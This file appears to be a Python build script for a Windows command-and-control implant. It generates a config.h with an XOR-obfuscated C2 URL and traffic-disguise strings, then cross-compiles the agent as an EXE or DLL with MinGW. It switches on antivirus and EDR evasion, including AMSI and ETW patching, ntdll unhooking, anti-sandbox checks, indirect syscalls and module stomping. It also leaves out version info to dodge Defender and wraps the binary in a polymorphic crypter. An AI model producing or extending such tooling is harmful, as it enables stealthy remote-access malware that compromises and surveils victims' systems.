#!/usr/bin/env python3
"""
Build script for generating a configured C agent .exe or .dll via MinGW cross-compilation.

Generates a config.h with embedded C2 settings and RSA public key,
then invokes x86_64-w64-mingw32-gcc to produce the agent binary.

Usage (standalone):
  python build_agent_c.py \
    --listener-url https://c2.example.com/api/v1 \
    --rsa-pubkey keys/server_pub.pem \
    --sleep 60 --jitter 25 \
    --output builds/agent.exe

  python build_agent_c.py \
    --listener-url https://c2.example.com/api/v1 \
    --format dll \
    --output builds/agent.dll

Usage (from operator shell):
  generate --url https://... --sleep 60 --jitter 25
  generate --url https://... --sleep 10 --format dll
"""

import argparse
import os
import shutil
import subprocess
import sys
from datetime import datetime
from pathlib import Path

sys.path.insert(0, str(Path(__file__).parent.parent))


def check_mingw():
    """Check if MinGW cross-compiler is available."""
    for cc in ["x86_64-w64-mingw32-gcc", "i686-w64-mingw32-gcc"]:
        if shutil.which(cc):
            return True
    return False


def extract_rsa_components(pubkey_path: Path) -> tuple:
    """Extract RSA modulus and exponent from a PEM public key file."""
    from cryptography.hazmat.primitives.serialization import load_pem_public_key
    from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey

    pem_data = pubkey_path.read_bytes()
    pub_key = load_pem_public_key(pem_data)
    if not isinstance(pub_key, RSAPublicKey):
        raise ValueError("Not an RSA public key")

    numbers = pub_key.public_numbers()
    modulus = numbers.n
    exponent = numbers.e

    # Convert to bytes (big-endian)
    mod_bytes = modulus.to_bytes((modulus.bit_length() + 7) // 8, 'big')
    exp_bytes = exponent.to_bytes((exponent.bit_length() + 7) // 8, 'big')

    return mod_bytes, exp_bytes


def generate_config_h(
    output_path: Path,
    listener_url: str,
    sleep_ms: int,
    jitter_pct: int,
    kill_date_unix: int,
    magic: int,
    cookie_name: str,
    uri_path: str,
    user_agent: str,
    wrapper_before: str,
    wrapper_after: str,
    rsa_modulus: bytes,
    rsa_exponent: bytes,
    no_evasion: bool = False,
    no_sandbox: bool = False,
    no_unhook: bool = False,
    no_etw: bool = False,
    no_amsi: bool = False,
    no_pe_stomp: bool = False,
    no_stack_spoof: bool = False,
    no_indirect_syscalls: bool = False,
    no_module_stomp: bool = False,
    no_phantom_hollow: bool = False,
    target_os: str = "win10",
    debug: bool = False,
):
    """Generate a config.h with XOR-encrypted strings to avoid static AV signatures."""
    import random

    # Generate random XOR key per build
    xor_key = random.randint(0x10, 0xFE)

    def bytes_to_c_array(data: bytes) -> str:
        return ", ".join(f"0x{b:02X}" for b in data)

    def xor_encrypt_str(s: str) -> tuple:
        """XOR-encrypt a string, return (encrypted_bytes_c_array, length)."""
        raw = s.encode('utf-8')
        encrypted = bytes(b ^ xor_key for b in raw)
        return bytes_to_c_array(encrypted), len(raw)

    # Encrypt all string configs
    enc_strings = {}
    string_configs = {
        'C2_URL': listener_url,
        'AGENT_VER': '1.0.0',
        'COOKIE_NAME': cookie_name,
        'URI_PATH': uri_path,
        'USER_AGENT': user_agent,
        'RESP_WRAPPER_BEFORE': wrapper_before.replace('\\n', '\n').replace('\\"', '"'),
        'RESP_WRAPPER_AFTER': wrapper_after.replace('\\n', '\n').replace('\\"', '"'),
        'PIPE_NAME': '\\\\.\\pipe\\spoolsvc',
        'PIPE_HOST': '',
        'DNS_DOMAIN': '',
        'CHANNEL_PRIORITY': 'http',
    }

    enc_decls = []
    for name, value in string_configs.items():
        c_arr, length = xor_encrypt_str(value)
        if length > 0:
            enc_decls.append(
                f"static const unsigned char CONFIG_{name}_ENC[] = {{ {c_arr} }};\n"
                f"#define CONFIG_{name}_LEN {length}"
            )
        else:
            enc_decls.append(
                f"static const unsigned char CONFIG_{name}_ENC[] = {{ 0 }};\n"
                f"#define CONFIG_{name}_LEN 0"
            )

    enc_block = "\n\n".join(enc_decls)

    config = f'''/*
 * config.h — Auto-generated by build_agent_c.py
 * Generated: {datetime.utcnow().isoformat()}Z
 *
 * All string values are XOR-encrypted at build time.
 * Use DECRYPT_CONFIG(dest, name) macro to decrypt at runtime.
 */
#ifndef CONFIG_H
#define CONFIG_H

/* ─── XOR key (randomized per build) ─── */
#define CONFIG_XOR_KEY 0x{xor_key:02X}

/* ─── Decrypt helper macro ─── */
#define DECRYPT_CONFIG(dest, name) do {{ \\
    for (unsigned int _i = 0; _i < CONFIG_##name##_LEN; _i++) \\
        (dest)[_i] = (char)(CONFIG_##name##_ENC[_i] ^ CONFIG_XOR_KEY); \\
    (dest)[CONFIG_##name##_LEN] = '\\0'; \\
}} while(0)

/* ─── Numeric configs (no encryption needed) ─── */
#define CONFIG_SLEEP_MS     {sleep_ms}
#define CONFIG_JITTER_PCT   {jitter_pct}
#define CONFIG_KILL_DATE    {kill_date_unix}
#define CONFIG_MAGIC        0x{magic:08X}
#define CONFIG_PIPE_ENABLED 0
#define CONFIG_DNS_ENABLED  0
#define CONFIG_CHANNEL_MAX_FAILURES  5

/* ─── Debug ─── */
#define CONFIG_DEBUG             {1 if debug else 0}

/* ─── Evasion Toggles ─── */
#define CONFIG_ANTI_DEBUG        {0 if no_evasion else 1}
#define CONFIG_ANTI_SANDBOX      {0 if (no_evasion or no_sandbox) else 1}
#define CONFIG_PATCH_AMSI        {0 if (no_evasion or no_amsi) else 1}
#define CONFIG_PATCH_ETW         {0 if (no_evasion or no_etw) else 1}
#define CONFIG_UNHOOK_NTDLL      {0 if (no_evasion or no_unhook) else 1}
#define CONFIG_SLEEP_OBFUSCATE   {0 if no_evasion else 1}
#define CONFIG_STACK_SPOOF       {1 if (target_os == "win11" and not no_stack_spoof and not no_evasion) else 0}
#define CONFIG_INDIRECT_SYSCALLS {0 if (no_evasion or no_indirect_syscalls) else 1}
#define CONFIG_PE_STOMP          {0 if (no_evasion or no_pe_stomp) else 1}
#define CONFIG_API_HASHING       1
#define CONFIG_MODULE_STOMP      {0 if (no_evasion or no_module_stomp) else 1}
#define CONFIG_PHANTOM_HOLLOW    {0 if (no_evasion or no_phantom_hollow) else 1}

/* ─── Process / Fork&Run ─── */
#define CONFIG_SPAWN_TO          L"C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe"
#define CONFIG_FORK_TIMEOUT_MS   30000

/* ─── Encrypted string configs ─── */
{enc_block}

/* ─── RSA Public Key (for key exchange) ─── */
static const unsigned char RSA_MODULUS[] = {{
    {bytes_to_c_array(rsa_modulus)}
}};
static const unsigned int RSA_MODULUS_LEN = {len(rsa_modulus)};

static const unsigned char RSA_EXPONENT[] = {{
    {bytes_to_c_array(rsa_exponent)}
}};
static const unsigned int RSA_EXPONENT_LEN = {len(rsa_exponent)};

#endif /* CONFIG_H */
'''
    output_path.write_text(config)


def build_agent(
    project_root: Path,
    listener_url: str = "https://127.0.0.1:8443/api/v1",
    rsa_pubkey_path: Path = None,
    sleep_sec: int = 60,
    jitter_pct: int = 25,
    kill_date: str = "",
    magic: int = 0xDEADF00D,
    arch: str = "x64",
    output_path: Path = None,
    profile_path: Path = None,
    no_evasion: bool = False,
    no_sandbox: bool = False,
    no_unhook: bool = False,
    no_etw: bool = False,
    no_amsi: bool = False,
    no_pe_stomp: bool = False,
    no_stack_spoof: bool = False,
    no_indirect_syscalls: bool = False,
    no_module_stomp: bool = False,
    no_phantom_hollow: bool = False,
    target_os: str = "win10",
    debug: bool = False,
    no_crypt: bool = False,
    format: str = "exe",
) -> Path:
    """
    Build a configured C agent.
    Returns the path to the compiled .exe or .dll.
    """
    agent_src = project_root / "agent_c"

    if not agent_src.exists():
        raise FileNotFoundError(f"Agent source not found: {agent_src}")

    # Load profile for HTTP settings
    cookie_name = "session"
    uri_path = "/api/v1"
    user_agent = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
    wrapper_before = '<html><body><div style=\\"display:none\\">\\n'
    wrapper_after = '\\n</div></body></html>\\n'

    if profile_path and profile_path.exists():
        from client.profiles.parser import load_profile
        profile = load_profile(profile_path)

        if profile.request_embedding:
            cookie_name = profile.request_embedding.param_name
        if profile.uri_paths:
            uri_path = profile.uri_paths[0]
        req_headers = getattr(profile, "request_headers", {})
        if "User-Agent" in req_headers:
            user_agent = req_headers["User-Agent"]
        # Use wrapper strings from profile if available
        resp_emb = profile.response_embedding
        if hasattr(resp_emb, "wrapper_before") and resp_emb.wrapper_before:
            wb = resp_emb.wrapper_before.replace('"', '\\"').replace('\n', '\\n')
            wrapper_before = wb
        if hasattr(resp_emb, "wrapper_after") and resp_emb.wrapper_after:
            wa = resp_emb.wrapper_after.replace('"', '\\"').replace('\n', '\\n')
            wrapper_after = wa

    # RSA key — REQUIRED for key exchange
    if rsa_pubkey_path and rsa_pubkey_path.exists():
        rsa_modulus, rsa_exponent = extract_rsa_components(rsa_pubkey_path)
        print(f"[*] RSA modulus: {len(rsa_modulus)} bytes ({len(rsa_modulus)*8}-bit) from {rsa_pubkey_path}")
        if len(rsa_modulus) != 256:
            raise RuntimeError(
                f"RSA modulus is {len(rsa_modulus)} bytes ({len(rsa_modulus)*8}-bit), "
                f"expected 256 bytes (2048-bit). Agent requires RSA-2048."
            )
    else:
        # Auto-generate RSA keypair if none provided
        keys_dir = project_root / "keys"
        keys_dir.mkdir(parents=True, exist_ok=True)
        priv_path = keys_dir / "server_priv.pem"
        pub_path = keys_dir / "server_pub.pem"

        if pub_path.exists():
            # Keys exist in default location, use them
            rsa_modulus, rsa_exponent = extract_rsa_components(pub_path)
            print(f"[*] Using existing RSA key: {pub_path}")
        else:
            # Generate new keypair
            try:
                from client.crypto.rsa import generate_keypair as rsa_gen, save_keypair as rsa_save
                priv_key, pub_key = rsa_gen()
                rsa_save(priv_key, private_path=priv_path, public_path=pub_path)
                rsa_modulus, rsa_exponent = extract_rsa_components(pub_path)
                print(f"[+] Auto-generated RSA-2048 keypair in {keys_dir}/")
            except ImportError:
                raise RuntimeError(
                    "No RSA public key provided and 'cryptography' package not installed.\n"
                    "Either:\n"
                    "  1. pip install cryptography && python scripts/generate_keys.py\n"
                    "  2. Pass --rsa-pubkey <path> to build_agent_c.py"
                )

    # Kill date
    kill_date_unix = 0
    if kill_date:
        try:
            dt = datetime.strptime(kill_date, "%Y-%m-%d")
            kill_date_unix = int(dt.timestamp())
        except ValueError:
            pass

    # Create temp build directory with a copy of sources
    import tempfile
    build_dir = Path(tempfile.mkdtemp(prefix="agent_c_build_"))
    shutil.copytree(agent_src, build_dir, dirs_exist_ok=True)

    # Generate config.h
    config_path = build_dir / "include" / "config.h"
    generate_config_h(
        config_path,
        listener_url=listener_url,
        sleep_ms=sleep_sec * 1000,
        jitter_pct=jitter_pct,
        kill_date_unix=kill_date_unix,
        magic=magic,
        cookie_name=cookie_name,
        uri_path=uri_path,
        user_agent=user_agent,
        wrapper_before=wrapper_before,
        wrapper_after=wrapper_after,
        rsa_modulus=rsa_modulus,
        rsa_exponent=rsa_exponent,
        no_evasion=no_evasion,
        no_sandbox=no_sandbox,
        no_unhook=no_unhook,
        no_etw=no_etw,
        no_amsi=no_amsi,
        no_pe_stomp=no_pe_stomp,
        no_stack_spoof=no_stack_spoof,
        no_indirect_syscalls=no_indirect_syscalls,
        no_module_stomp=no_module_stomp,
        no_phantom_hollow=no_phantom_hollow,
        target_os=target_os,
        debug=debug,
    )

    # Determine output path
    ext = ".dll" if format == "dll" else ".exe"
    if not output_path:
        output_path = project_root / "builds" / f"agent_{arch}{ext}"
    output_path.parent.mkdir(parents=True, exist_ok=True)

    # Select compiler
    if arch == "x64":
        cc = "x86_64-w64-mingw32-gcc"
        strip = "x86_64-w64-mingw32-strip"
    else:
        cc = "i686-w64-mingw32-gcc"
        strip = "i686-w64-mingw32-strip"

    if not shutil.which(cc):
        raise FileNotFoundError(
            f"{cc} not found. Install mingw-w64:\n"
            f"  sudo apt install mingw-w64"
        )

    # ─── Generate PE resource file with version info + manifest ───
    windres = "x86_64-w64-mingw32-windres" if arch == "x64" else "i686-w64-mingw32-windres"
    res_obj = None

    # No version info block — claiming to be a Microsoft binary without a valid
    # Authenticode signature is the #1 static detection trigger in Defender.
    # Only embed the application manifest (asInvoker + DPI aware).
    rc_content = r"""
1 24 BEGIN
"<?xml version=""1.0"" encoding=""UTF-8"" standalone=""yes""?>\r\n"
"<assembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0"">\r\n"
"  <trustInfo xmlns=""urn:schemas-microsoft-com:asm.v3"">\r\n"
"    <security>\r\n"
"      <requestedPrivileges>\r\n"
"        <requestedExecutionLevel level=""asInvoker"" uiAccess=""false""/>\r\n"
"      </requestedPrivileges>\r\n"
"    </security>\r\n"
"  </trustInfo>\r\n"
"  <application xmlns=""urn:schemas-microsoft-com:asm.v3"">\r\n"
"    <windowsSettings>\r\n"
"      <dpiAware xmlns=""http://schemas.microsoft.com/SMI/2005/WindowsSettings"">true</dpiAware>\r\n"
"    </windowsSettings>\r\n"
"  </application>\r\n"
"</assembly>\r\n"
END
"""
    rc_path = build_dir / "agent.rc"
    rc_path.write_text(rc_content)

    if shutil.which(windres):
        res_obj_path = build_dir / "agent_res.o"
        wr_result = subprocess.run(
            [windres, str(rc_path), "-o", str(res_obj_path)],
            capture_output=True, text=True
        )
        if wr_result.returncode == 0:
            res_obj = res_obj_path

    # Compile — exclude reflective_loader.c (compiled separately to shellcode)
    # For EXE builds, also exclude dll_entry.c (DLL-only entry point)
    exclude_src = {"reflective_loader.c"}
    if format == "exe":
        exclude_src.add("dll_entry.c")

    src_files = [f for f in (build_dir / "src").glob("*.c")
                 if f.name not in exclude_src]

    cmd = [
        cc,
        f"-I{build_dir / 'include'}",
        "-Wall", "-Os", "-s",
        "-fno-asynchronous-unwind-tables", "-fno-ident",
        "-fno-omit-frame-pointer",
        "-fdata-sections", "-ffunction-sections",
        "-DWIN32_LEAN_AND_MEAN", "-D_WIN32_WINNT=0x0603",
        "-o", str(output_path),
    ] + [str(f) for f in src_files]

    if res_obj and res_obj.exists():
        cmd.append(str(res_obj))

    cmd += [
        "-lbcrypt", "-lwinhttp", "-ladvapi32", "-lkernel32", "-lntdll",
        "-ldnsapi", "-lole32", "-loleaut32", "-liphlpapi", "-lws2_32",
        "-lgdi32", "-luser32",
        "-static-libgcc",
    ]

    # Format-specific linker flags
    if format == "dll":
        # DLL: use CRT entry (DllMainCRTStartup), shared library, kill ordinal decoration
        cmd += [
            "-shared",
            "-Wl,--gc-sections",
            "-Wl,--kill-at",
        ]
    else:
        # EXE: skip CRT, subsystem windows, custom entry
        cmd += [
            "-Wl,--subsystem,windows",
            "-Wl,--gc-sections",
            "-Wl,-e,main",
        ]

    result = subprocess.run(cmd, capture_output=True, text=True)
    if result.returncode != 0:
        raise RuntimeError(f"Compilation failed:\n{result.stderr}")

    if shutil.which(strip):
        subprocess.run([strip, "--strip-all", str(output_path)], capture_output=True)

    shutil.rmtree(build_dir, ignore_errors=True)

    # ─── Pass 2: Polymorphic encryption (wrap in stub loader) ───
    # Only for EXE format — DLL is loaded by a trusted process so on-disk
    # evasion is handled by the host binary's reputation.
    if format == "exe" and not no_crypt:
        # pe_crypt.py lives in scripts/ alongside this file
        _scripts_dir = str(Path(__file__).parent)
        if _scripts_dir not in sys.path:
            sys.path.insert(0, _scripts_dir)
        from pe_crypt import crypt_pe

        stub_dir = project_root / "agent_c" / "stub"
        if not (stub_dir / "stub_loader.c").exists():
            print("[!] Stub loader not found, skipping crypter pass")
        else:
            # Rename raw agent → payload, crypt into final output
            payload_path = output_path.with_suffix(".payload.exe")
            output_path.rename(payload_path)
            try:
                crypt_pe(
                    input_pe=payload_path,
                    output_exe=output_path,
                    stub_dir=stub_dir,
                    arch=arch,
                    debug=debug,
                )
            finally:
                # Keep raw payload as .raw.exe for spawn (reflective injection)
                # The crypter is for on-disk evasion; spawn payloads never touch disk.
                raw_path = output_path.with_suffix(".raw.exe")
                if payload_path.exists():
                    payload_path.rename(raw_path)
                    print(f"[*] Raw agent (spawn payload): {raw_path}")
    elif format == "dll":
        print("[*] DLL format — skipping crypter (loaded via trusted process)")

    return output_path


def parse_args():
    p = argparse.ArgumentParser(description="Build configured C agent")
    p.add_argument("--listener-url", default="https://127.0.0.1:8443/api/v1")
    p.add_argument("--rsa-pubkey", type=Path, default=None)
    p.add_argument("--profile", type=Path, default=None)
    p.add_argument("--sleep", type=int, default=60, help="Sleep interval in seconds")
    p.add_argument("--jitter", type=int, default=25, help="Jitter percentage (0-99)")
    p.add_argument("--kill-date", default="", help="Kill date (YYYY-MM-DD)")
    p.add_argument("--magic", default="0xDEADF00D")
    p.add_argument("--arch", choices=["x64", "x86"], default="x64")
    p.add_argument("--format", choices=["exe", "dll"], default="exe",
                   help="Output format: exe (default) or dll")
    p.add_argument("--output", type=Path, default=None)
    p.add_argument("--no-evasion", action="store_true",
                   help="Disable all evasion (anti-debug, anti-sandbox, AMSI/ETW patches, sleep obf)")
    p.add_argument("--no-sandbox", action="store_true",
                   help="Disable anti-sandbox checks only")
    p.add_argument("--no-unhook", action="store_true",
                   help="Disable ntdll unhooking only")
    p.add_argument("--no-etw", action="store_true",
                   help="Disable ETW patching only")
    p.add_argument("--no-amsi", action="store_true",
                   help="Disable AMSI patching only")
    p.add_argument("--no-pe-stomp", action="store_true",
                   help="Disable PE header stomping only")
    p.add_argument("--no-stack-spoofing", action="store_true",
                   help="Disable thread stack spoofing during sleep (even on win11)")
    p.add_argument("--no-indirect-syscalls", action="store_true",
                   help="Disable indirect syscalls (Hell's Gate + Halo's Gate)")
    p.add_argument("--no-module-stomp", action="store_true",
                   help="Disable module stomping for BOF .text sections")
    p.add_argument("--no-phantom-hollow", action="store_true",
                   help="Disable phantom DLL hollowing (alternative to module stomp)")
    p.add_argument("--target-os", choices=["win10", "win11"], default="win10",
                   help="Target OS version. Stack spoofing only enabled on win11 (default: win10)")
    p.add_argument("--no-crypt", action="store_true",
                   help="Skip polymorphic encryption (output raw agent, useful for debugging)")
    p.add_argument("--debug", action="store_true",
                   help="Enable debug logging to %%TEMP%%\\agent_debug.log")
    return p.parse_args()


def main():
    args = parse_args()
    project_root = Path(__file__).parent.parent

    magic = int(args.magic, 16) if args.magic.startswith("0x") else int(args.magic)

    rsa_path = args.rsa_pubkey
    if not rsa_path:
        default_rsa = project_root / "keys" / "server_pub.pem"
        if default_rsa.exists():
            rsa_path = default_rsa

    try:
        out_path = build_agent(
            project_root,
            listener_url=args.listener_url,
            rsa_pubkey_path=rsa_path,
            sleep_sec=args.sleep,
            jitter_pct=args.jitter,
            kill_date=args.kill_date,
            magic=magic,
            arch=args.arch,
            output_path=args.output,
            profile_path=args.profile,
            no_evasion=args.no_evasion,
            no_sandbox=args.no_sandbox,
            no_unhook=args.no_unhook,
            no_etw=args.no_etw,
            no_amsi=args.no_amsi,
            no_pe_stomp=args.no_pe_stomp,
            no_stack_spoof=args.no_stack_spoofing,
            no_indirect_syscalls=args.no_indirect_syscalls,
            no_module_stomp=args.no_module_stomp,
            no_phantom_hollow=args.no_phantom_hollow,
            target_os=args.target_os,
            debug=args.debug,
            no_crypt=args.no_crypt,
            format=args.format,
        )
        size_kb = out_path.stat().st_size / 1024
        print(f"[+] Agent built: {out_path} ({size_kb:.1f} KB)")
    except FileNotFoundError as e:
        print(f"[!] {e}")
        sys.exit(1)
    except RuntimeError as e:
        print(f"[!] {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()
